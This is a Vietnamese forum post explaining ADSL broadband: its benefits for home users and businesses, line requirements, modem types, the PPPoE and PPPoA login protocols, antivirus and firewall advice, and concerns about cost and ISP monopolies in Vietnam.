Bài viết này chủ yếu nói về ADSL. Nếu bạn có nhu cầu tìm hiều về các công nghệ DSL khác, xin liên hệ với tôi hoặc tự tìm tài liệu nghiên cứu qua công cụ tìm kiếm trên mạng như Google.
ADSL và Internet trên băng thông rộng
ADSL là một trong những kết nối Internet phổ biến cung cấp băng thông lớn cho việc truyền tải dữ liệu (tiếng Anh gọi là broadband Internet). Broadband Internet so với kết nối bằng modem quay số truyền thống là một cuộc cách mạng lớn về tốc độ, chất lượng và nội dung, cũng giống như so sánh Nvidia GeForce 4 TI4600 với S3 Trio 1MB PCI vậy. Với tốc độ kết nối gấp hàng chục đến hàng trăm lần modem quay số, ADSL – một ứng dụng của broadband Internet - sẽ giúp bạn thực sự thưởng thức thế giới kĩ thuật số trên mạng toàn cầu. Thực sự có thể lướt trên Inet chứ không phải bò lổm ngổm trên Inet như hiện tại.
A. Ðối với người dùng
Về cơ bản, ADSL sẽ giúp bạn làm những việc quen thuộc trên Internet như dùng thư điện tử, duyệt websites, duyệt diễn đàn, tải file..v.v.. nhưng nhanh hơn trước rất nhiều lần và bạn có thể làm những việc đó đồng thời thay vì phải làm lần lượt từng thứ một như trước đây. Bạn có thể thoải mái thưởng thức Internet do không phải dài cổ đợi modem quay số gọi tổng đài hay ngồi đọc truyện chưởng chờ trang web nạp xong trên trình duyệt. Một điều đáng chú ý là bạn không phải trả cước gọi điện thoại khi dùng ADSL, và đường dây vẫn dùng để gọi được khi đang duyệt Internet, dù công nghệ này dựa trên đường điện thoại có sẵn.
Ngoài việc tăng tốc cho những nhu cầu Internet phổ biến ở trên, ADSL còn giúp bạn sử dụng Internet vào những tác vụ mà trước đây modem quay số vẫn phải khóc lóc thảm thiết vẫy cờ trắng đầu hàng.
• Thứ nhất, bạn có thể truy cập những website thiết kế với chất lượng cao, dùng flash, nhạc nền, nhiều hình động…
• Thứ hai, bạn có thể nghe và xem các bài hát, bản tin, giới thiệu phim… từ khắp mọi nơi trên thế giới.
• Thứ ba là phim theo yêu cầu (tiếng Anh gọi là movie-on-demand), với băng thông rộng và công nghệ nén và truyền hình ảnh, âm thanh tiên tiến, phim ảnh có thể được truyền qua Internet và bạn có toàn quyền chọn lựa chương trình, tạm dừng hoặc tua đi tua lại tùy thích. Hiện nay nhà cung cấp dịch vụ Internet của Singapore là SingNet đang cung cấp dịch vụ này với giá khoảng 6.5 USD/tháng (giá khuyến mại cho 12 tháng đầu là 2.5 USD) qua đường ADSL 512Kbps.
• Thứ tư là hội thảo video qua mạng: kết hợp với webcam, ADSL sẽ giúp bạn đàm thoại với bạn bè, người thân hay đối tác kinh doanh qua Internet với âm thanh và hình ảnh chất lượng cao.
• Thứ năm là chơi multiplayer game trên Internet với bạn bè khắp thế giới. Với thời gian ping rất thấp, ADSL cho phép các game mạng chạy trơn tru, khiến chơi game qua Internet nhanh hơn và thú vị hơn. (BTV - Chứ không phải như bây giờ, nhấn nút bắn và gọi điện thoại cho đối thủ hỏi xem hắn ta chết chưa)
• Thứ sáu là học qua mạng. Bạn có thể tham dự các khóa học từ xa tổ chức bởi các trường đại học tên tuổi trên thế giới hoặc truy cập các thư viện điện tử trên mạng nhanh hơn.
B. Ðối với doanh nghiệp
Thương mại điện tử và nền công nghiệp thông tin là nền tảng tương lai của mọi nền kinh tế. ADSL nói riêng và broadband Internet nói chung khiến thương mại điện tử trở nên khả thi. Các cửa hàng trên mạng có thể được thiết kế với tính tương tác cao hơn, cách trình bày sản phẩm hấp dẫn hơn với người dùng. Loại cửa hàng này dễ thiết kế, dễ bảo quản, giá thành rẻ, kết hợp với khả năng tương tác trực tiếp với người dùng sẽ giúp cho doanh nghiệp nhỏ có thể cạnh tranh với các cơ sở lớn hơn trên quy mô toàn cầu.
Nền công nghệ phần mềm của Việtnam sẽ đạt tính cạnh tranh cao hơn với Internet băng thông rộng. Việc phát triển, thăm dò và xâm nhập thị trường cũng như nhận đơn đặt hàng và giao sản phẩm sẽ trở nên dễ dàng hơn và kinh tế hơn rất nhiều.
Ðiều kiện để lắp đặt ADSL
Ðiều kiện cơ bản là bạn phải có một đường điện thoại (!) Chi tiết hơn, đường điện thoại đó phải đáp ứng những yêu cầu sau:
• Cách tổng đài dưới 5500 m. Càng gần tổng đài, tốc độ truy cập của bạn càng tăng. Dĩ nhiên nếu nhà cung cấp dịch vụ giới hạn tốc độ thì dù ở đâu bạn cũng chỉ đạt tối đa là tốc độ giới hạn.
• Không bị áp dụng công nghệ pair gain. Pair gain là công nghệ kĩ thuật số tách đường cáp điện thoại ra làm hai (ở đây xét pair gain 1+1). Công nghệ này được nhà cung cấp dịch vụ điện thoại hay áp dụng để giảm chi phí trong trường hợp nhà bạn muốn có thêm đường điện thoại. Ðiểm dở của nó là kết nối Internet quay số sẽ bị giảm một nửa tốc độ (28.8Kbps tối đa so với 56Kbps tối đa) và không thể dùng với ADSL. (BTV - Theo tôi biết thì phần lớn thuê bao điện thoại không bị áp dụng công nghệ này)
• Không bị áp dụng công nghệ RIM – Remoted Integrated Multiplexer. Công nghệ này dựa trên đường cáp quang (fibre-optic cable), nhà cung cấp dịch vụ điện thoại dẫn cáp quang đến một khu vực rồi chuyển tín hiệu trên cáp quang thành dịch vụ điện thoại bình thường. RIM rất kinh tế khi lắp đặt điện thoại ở những nơi không có sẵn mạng cáp điện thoại bằng đồng như khu vực ngoại ô mới xây, vùng sâu vùng xa hay hải đảo.
Trang thiết bị
Nếu đường điện thoại của bạn có thể hỗ trợ ADSL, bạn chỉ cần liên lạc nhà cung cấp dịch vụ là họ sẽ lo phần kết nối bạn vào tổng đài. Nhưng về phần lắp đặt tại nhà thì bạn phải tự làm lấy, nếu thuê dịch vụ thì sẽ rất đắt. Ngay cả việc mua sắm thiết bị có khi cũng nên tự túc, vì nhà cung cấp có thể bán rất đắt. Tự túc mua sắm và lắp đặt thiết bị sẽ giúp bạn tiết kiệm được khá nhiều và hơn nữa bạn làm chủ thiết bị, có thể chuyển qua nhà cung cấp dịch vụ khác dễ dàng hơn (hi vọng Việtnam sẽ có nhiều nhà cung cấp dịch vụ Internet trong tương lai). Bạn cứ yên tâm, vì lắp đặt rất dễ dàng, không hề khó hơn việc lắp đặt modem quay số đâu. Tuy nhiên, trước khi mua thiết bị, bạn nên kiểm tra với nhà cung cấp xem thiết bị đó có được họ hỗ trợ không.
Cũng gần giống như kết nối quay số, bạn cần một modem làm trung gian giữa máy tính và đường điện thoại để chuyển đổi giữa tín hiệu và dữ liệu. Có ba loại modem hỗ trợ ADSL.
• Modem trên card PCI: loại này tích hợp tất cả trên một card PCI. Giá thành rẻ nhất trong ba loại, nhưng rất khó cài đặt, kén chọn hệ điều hành và không hỗ trợ chia sẻ kết nối đến nhiều máy tính. Nếu bạn tính dùng thêm Linux hay Mac OS X, hay chia sẻ kết nối ADSL với nhiều máy khác, hay là dân overclocker, nên tránh xa loại này.
• Modem USB: đây là loại modem lắp ngoài kết nối qua giao tiếp USB 1.1. Giá chỉ hơn loại trước một chút và trông có vẻ dễ lắp đặt. Nhưng thực ra loại này cũng kén hệ điều hành không kém loại kia, cài đặt tương đối khó và không hỗ trợ chia sẻ kết nối. Hơn nữa, tốc độ của USB 1.1 rất thấp (tối đa là 12Mbps nhưng thực tế còn thấp hơn nhiều), không thích hợp với ADSL tốc độ cao, lại dùng nhiều tài nguyên hệ thống. Bạn nên cân nhắc kĩ trước khi chọn USB cho ADSL.
• Ethernet modem lắp ngoài: đây là loại phổ biến nhất. Nó dùng giao tiếp ethernet với máy tính qua card mạng 10/100. Ưu điểm là rất dễ lắp đặt, hỗ trợ hầu hết các hệ điều hành, dễ chia sẻ kết nối. Nhược điểm là giá thành cao hơn các loại khác (có tính cả giá của card mạng). Ethernet ADSL modem có khi được tích hợp thêm một số chức năng như tường lửa (hardware firewall) hay router và hub hay switch lắp trong (giúp bạn chia sẻ kết nối với các máy khác dễ dàng).
Nếu bạn muốn dùng các thiết bị khác như máy điện thoại hay fax trên đường dây mà ADSL dùng, bạn cần một bộ lọc để lọc tín hiệu. Giá thành của nó rất rẻ và thường được bán kèm modem nếu bạn mua từ nhà cung cấp dịch vụ.
Phần mềm cần thiết
Ðể đăng nhập vào mạng ADSL của nhà cung cấp, bạn cần phần mềm đăng nhập thích hợp hỗ trợ một trong hai giao thức PPPoE hoặc PPPoA. Giao thức thứ nhất, PPPoE, viết tắt của cụm từ Point to Point Protocol over Ethernet, là giao thức đăng nhập phổ biến nhất cho các kết nối dạng DSL. Khi bạn đăng kí ADSL, bạn sẽ được cung cấp phần mềm PPPoE tương thích với nhà cung cấp. Những phần mềm này đều được sửa lại từ những phần mềm PPPoE có sẵn như Enternet, vì vậy bạn có thể dùng phần mềm khác thay thế. Nếu bạn dùng các hệ điều hành mới như Windows XP hay Mac OS X thì chúng có sẵn hỗ trợ cho PPPoE. Giao thức thứ hai, PPPoA, viết tắt của Point to Point Protocol over ATM, rất giống với PPPoE nhưng không tương thích với nhau. Nó đang bị dần loại bỏ và thay thế bởi PPPoE.
Khi dùng ADSL, thời gian máy của bạn hoạt động trên Internet cũng như lượng thông tin bạn truy cập tăng rất nhiều so với thời modem quay số. Vì thế, bạn cần trang bị phần mềm chống virus và tường lửa để phòng ngừa tin tặc tấn công. Tuy chẳng ai truy cập máy bạn để ăn trộm vài bài MP3 hay xem trộm thư tình của bạn đâu, nhưng họ có thể tặng bạn vài con ngựa thành Troy để chiếm quyền điều khiển máy bạn và thực hiện tấn công kiểu DDoS đến các máy chủ khác. Nên tránh các phiền phức loại này bằng các phần mềm hữu dụng. Tôi khuyên nên dùng Norton Anti-virus để ngừa virus và ZoneAlarm hay Norton Internet Firewall để làm tường lửa.
Những khó khăn và hạn chế có thể gặp
Nhà cung cấp dịch vụ có thể gặp khó khăn hay tạo khó khăn cho bạn khi dùng ADSL. Những khó khăn và hạn chế này có thể chia làm hai loại: chất lượng dịch vụ và giá thành dịch vụ.
Thứ nhất, đảm bảo chất lượng dịch vụ cho ADSL không phải là điều dễ dàng với một nước có cơ sở hạ tầng Internet yếu kém như Việt Nam. Trước tiên, nhà cung cấp dịch vụ phải có các máy chủ rất mạnh để có thể đáp ứng được những kết nối tốc độ cao trong thời gian dài (kết nối ADSL được thiết kế để chạy 24/7) từ các máy khách. Ngoài ra, đường kết nối từ các máy chủ đó lên Internet cũng phải đảm bảo tốc độ truy cập cho các máy khách. Ðây quả là một thách thức lớn đối với các nhà cung cấp dịch vụ Internet ở Việt Nam, khi mà cơ sở hạ tầng của họ chưa đủ để đảm bảo kết nối của những người dùng modem quay số. Ðấy là còn chưa kể đến vấn đề hỗ trợ kĩ thuật, khi mà ADSL yêu cầu phần mềm đăng nhập mới, các thiết bị cài đặt mới và sẽ nảy sinh các vấn đề tương thích mới. (BTV - Hiện do được sự trợ giúp của Korea Telecom nên có thể khả năng này sẽ được giảm thiểu)
Thứ hai, giá thành dịch vụ luôn là nỗi băn khoăn thường trực của người dùng Việt Nam từ khi Internet xuất hiện. Giá thành lắp đặt ADSL thường khá cao. Giá của ethernet ADSL modem thường từ 120 USD trở lên, nếu tính cả card mạng và bộ lọc thì ít nhất cũng là 150 USD. Ngoài ra còn cước phí để nhà cung cấp nối đường điện thoại của bạn vào trạm ADSL ở tổng đài, tuy nhiên bạn có thể được khuyến mãi phần này. Với tính năng always-on, tức là lúc nào cũng hoạt động của ADSL, và việc không phải quay số để kết nối, hi vọng nhà cung cấp dịch vụ không tính tiền theo phút như với kết nối quay số. Lý tưởng nhất là bạn trả cước thuê bao cố định và có tốc độ tối đa của đường truyền cho phép cũng như băng thông hàng tháng lớn tùy thích. Tình huống lý tưởng này, tiếc thay, chỉ có một vài nước trên thế giới mới có, ví dụ như ở Hồng Kông. Ða số các nhà cung cấp ADSL hiện nay cung cấp đường kết nối với tốc độ được giới hạn, phổ biến là ở mức 512 Kbps tải xuống và 128 Kbps tải lên, và băng thông hàng tháng cũng được giới hạn: bạn chỉ được tải xuống/tải lên một lượng dữ liệu tính bằng GB nhất định. Bạn trả thuê bao cố định hàng tháng. Nếu bạn dùng nhiều băng thông hơn, bạn sẽ phải trả thêm nhưng thường là họ tính rất đắt, 1 GB ra ngoài giới hạn có giá đắt hơn rất nhiều so với 1 GB ở trong giới hạn. Nhà cung cấp dịch vụ sẽ có phần mềm thích hợp để đo băng thông sử dụng của bạn và phần mềm này cũng chạy ngay trên máy bạn. Nó đo là một chuyện, còn đo chính xác hay không lại là chuyện khác, và vấn đề này đôi khi gây đau đầu cho người sử dụng. Chắc chắn bạn không muốn bị choáng nặng hay ngất xỉu khi nhận được hóa đơn hàng tháng phải không? (BTV - Hiện nay bưu điện Việtnam và bộ Y tế chưa có liên kết về vấn đề giải quyết hậu quả của việc ngất xỉu do giá cước ADSL, nên giá sẽ không khủng khiếp như lời GreenBeret nói, chúng tôi đã nhận được một số tin tức về giá cả mà bạn có thể đọc ở trang đầu)
Việc cạnh tranh trên thị trường ADSL cũng là vấn đề nan giải. Nền tảng của ADSL chính là hệ thống cáp điện thoại và các trạm chuyển đặt ở các tổng đài. Công ty nào nắm quyền kiểm soát những cơ sở hạ tầng ấy thì sẽ có độc quyền trên thị trường ADSL. Các công ty khác sẽ không đủ điều kiện tài chính cũng như cơ sở pháp lý để tự lập ra hệ thống cáp điện thoại và tổng đài riêng, và sẽ phải trở thành đại lý của công ty kia. Ðây là tình hình của thị trường ADSL tại Úc, nơi mà công ty Telstra nắm gần như toàn bộ hệ thống cáp điện thoại và 100% các trạm chuyển ADSL ở các tổng đài. Sự độc quyền ấy hiện đang làm Internet băng thông rộng ở Úc chết dần chết mòn. (BTV - Hiện tại Việtnam cũng đang có tình trạng độc quyền này, hy vọng sẽ không xảy ra tình trạng như ở Úc hiện tại. Các bác bưu điện ơi đừng học tập Telstra nhá...)
Kết
Sự giới thiệu Internet băng thông rộng, hay cụ thể là ADSL ở Việt Nam sẽ thúc đẩy công nghệ thông tin cũng như nền kinh tế và giáo dục của nước ta đuổi theo các nước khác. Một điểm rất dễ nhận trong việc áp dụng ADSL trên thế giới là ở các nước châu Á (cụ thể là Hồng Kông, Singapore, Hàn Quốc, Nhật Bản, Trung Quốc ….), ADSL được dùng rộng rãi và có giá thành rẻ hơn rất nhiều so với các nước phát triển khác như Úc, Mĩ hay Tây Âu. Hi vọng Việt Nam sẽ phát triển ADSL theo con đường của các nước châu Á anh em để tạo nên cuộc cách mạng Internet trong nước, góp phần lớn hỗ trợ nền kinh tế và giáo dục đào tạo.
Tác giả: (someone)
|
|
|
|
Ok
Thanks Commale
|
|
|
|
|
Có một số bài viết trên HVA trước đây không nhớ tên tác giả liệu có upload được không???
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
